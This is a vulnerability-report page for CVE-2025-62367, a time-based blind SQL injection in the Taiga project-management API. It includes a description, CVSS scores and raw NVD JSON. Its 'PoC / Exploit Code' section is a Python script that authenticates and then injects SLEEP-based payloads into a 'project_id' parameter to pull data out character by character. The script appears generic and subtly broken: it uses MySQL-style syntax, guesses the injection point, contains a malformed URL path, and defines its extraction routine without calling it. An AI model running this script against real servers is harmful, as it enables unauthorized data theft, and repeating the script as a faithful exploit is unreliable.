Security Vulnerability Report
中文
CVE-2025-62367 CVSS 4.8 MEDIUM

CVE-2025-62367

Published: 2025-10-28 20:15:50
Last Modified: 2026-04-15 00:35:42

Description

Taiga is an open source project management platform. In versions 6.8.3 and earlier, Taiga API is vulnerable to time-based blind SQL injection allowing sensitive data disclosure via response timing. This issue is fixed in version 6.9.0.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Taiga < 6.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2025-62367 PoC - Time-based Blind SQL Injection in Taiga API # Target: Taiga instance with vulnerable API endpoint TARGET_URL = "http://target-server/api/v1/" USERNAME = "[email protected]" PASSWORD = "password123" def login(): """Authenticate and get session token""" session = requests.Session() login_data = {"username": USERNAME, "password": PASSWORD} response = session.post(f"{TARGET_URL}auth/ login", json=login_data) return session if response.status_code == 200 else None def sql_injection_test(session, payload): """Test SQL injection with time-based payload""" # Inject time-based SQL payload in vulnerable parameter params = {"project_id": f"1; SELECT CASE WHEN ({payload}) THEN SLEEP(5) ELSE 0 END--"} start_time = time.time() response = session.get(f"{TARGET_URL}projects/", params=params) elapsed = time.time() - start_time return elapsed > 5 def extract_data(session): """Extract sensitive data using blind SQL injection""" # Example: Extract database version character by character extracted = "" charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" for pos in range(1, 20): for char in charset: payload = f"(SELECT SUBSTRING(@@version,{pos},1)='{char}')" if sql_injection_test(session, payload): extracted += char break return extracted if __name__ == "__main__": session = login() if session: print("[*] Testing CVE-2025-62367") if sql_injection_test(session, "1=1"): print("[!] Vulnerable to SQL Injection") else: print("[-] Not vulnerable or patched")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62367", "sourceIdentifier": "[email protected]", "published": "2025-10-28T20:15:49.687", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Taiga is an open source project management platform. In versions 6.8.3 and earlier, Taiga API is vulnerable to time-based blind SQL injection allowing sensitive data disclosure via response timing. This issue is fixed in version 6.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/taigaio/taiga-back/security/advisories/GHSA-chm9-9wwq-xffj", "source": "[email protected]"}]}}